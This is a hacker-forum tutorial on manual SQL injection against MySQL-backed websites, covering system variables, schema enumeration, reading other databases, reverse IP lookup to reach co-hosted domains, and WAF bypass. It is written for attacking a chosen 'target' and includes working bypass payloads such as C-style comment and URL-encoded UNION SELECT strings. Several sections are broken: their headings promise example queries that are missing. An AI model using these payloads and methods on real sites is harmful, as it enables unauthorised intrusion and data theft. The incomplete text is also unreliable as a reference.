Myanmar H4x0r

---

SYSTEM VARIABLES
Again the query for getting VERSION, USER and DATABASE:

I already explained that VERSION(), USER() and DATABASE() are system variables. But of course these are not the only ones.
Note that the variables are not always the same on different SQL-server (MySQL,MSSQL,PostgreSQL,...)!
The next thing is: be smart and creativ! For all SQL-server you will find tons of information in the world wide web. 
For MySQL i strongly recommend https://dev.mysql.com/ again. You will find all infos about MySQL-servers in there. BOOKMARK THIS!

Some examples of other sytem variables for MySQL-servers are:
@@VERSION_COMPILE_OS // operating system of the target-server
@@HOSTNAME // hostname 
@@DATADIR // you see we also can get some info about folder structure
@@LOG_ERROR // location of the error logging file

Some synonyms for EQUAL output:
VERSION()
@@GLOBAL.VERSION
@@VERSION

USER()
CURRENT_USER()
SYSTEM_USER()

DATABASE()
SCHEMA()

ALTERNATIVE QUERIES FOR SAME RESULT
We can grab the same information from different locations in the INFORMATION_SCHEMA database. 
This helps when some keywords are filtered by a WAF or similar. Some examples listed below:

examples for alternative queries for finding all databases:

examples for tables:

for columns:

Keep that in mind and take the time to check all tables of the INFORMATION_SCHEMA database: https://dev.mysql.com/doc/refman/5.0/en/...chema.html
And remember: THIS SYSTEM DATABASE IS ONLY AVAILABLE IN MYSQL VERSIONS 5 AND ABOVE!

GRAB DATA FROM OTHER DATABASES
I will show you now how to pick data from other databases than the current. 
Let‘s say the other database (not the current) is called test and it has a table called member with columns named id and name.
The queries to receive the results would be look like this:

Tables:

Columns:

Data:

Explanation:
The first two queries are similar than the ones of the UNION tutorial part. Again with HEX the database name (test) and the table name (member). To receive the data(values) of the table member (situated in database test) we change the FROM part to:
FROM DATABASE.TABLE = FROM test.member (again no need for HEX when grab data directly)

FIND OTHER DOMAINS ON SAME SERVER
If you got a special target but it is not vulerable you can try to find other domains located on the same server and try to inject them to maybe grab data of your prefered target! 
This search technique is called "Reverse IP Lookup".
Check this page and enter your target domain adress in the input field: Reverse IP Domain Check

COMBINE STATEMENTS
Now you already now how injection queries work but you dont know how to combine these functions in one column. For that we use various functions. I will explain the most used one:CONCAT()

Explanation:
CONCAT() - „Returns the string that results from concatenating the arguments“.
So with that MySQL string function we can combine as much queries as we want and they will all fit in one vulnerable column. 
NOTE: We have to seperate each select query with a comma!

WAF BYPASS
Web Application Firewall means a software (a script, e.t.c.) which try to prevent SQL injections (for example). It works in different way‘s and each WAF is different in most cases. A WAF mostly filter keywords, for example SELECT, UNION, FROM, WHERE and so on...(it depends on the WAF what exactly is filtered). Some WAF‘s are easy to bypass, some unbreakable, you will see many times such WAF‘s in work. I now will list you some basic ways to bypass a WAF. We have some very detailed tutorials about that topic and i will link them after a short explanation:

C-style comments:
Many WAF‘s are coded in programming language C. So sometimes we can easily bypass such WAF‘s with putting the words in comments of this programming language:

UNION ALL /*!SELECT*/ 1,2,3,4,5,6,7,8
UNION ALL /*!500000SELECT*/ 1,2,3,4,5,6,7,8
/*UNION*/ ALL /*SELECT*/ 1,2,3,4,5,6,7,8

URL encoding:
This you may seen when URL‘s where transmitted. Basically it means convert char‘s to HEX and put a % in front:
%75nion all %73elect 1,2,3,4,5

Example of a SELECT query with some keyword chars URL encoded:

COMMENT OUT THE ORIGINAL QUERY
Sometimes we need to comment out the original query. I used the two -- (at the end of the injecting query) for that in our example. 
That is mostly used for INT based queries. For string based mostly used is --+- or %23. Below some other you can try:

TOOLS
Dont use any automated tools (like Havji or sqlmap)!!! Do it the manually way with the URL bar of your browser. 
For a lil help you can try the mozilla Hackbar: 
https://addons.mozilla.org/de/firefox/addon/hackbar/. 
I did a lil modification of that extension. If you want you can check it out here:
[TOOL] t.PRO Hackbar mod 1.4.2 [/TOOL]
credit:T-pro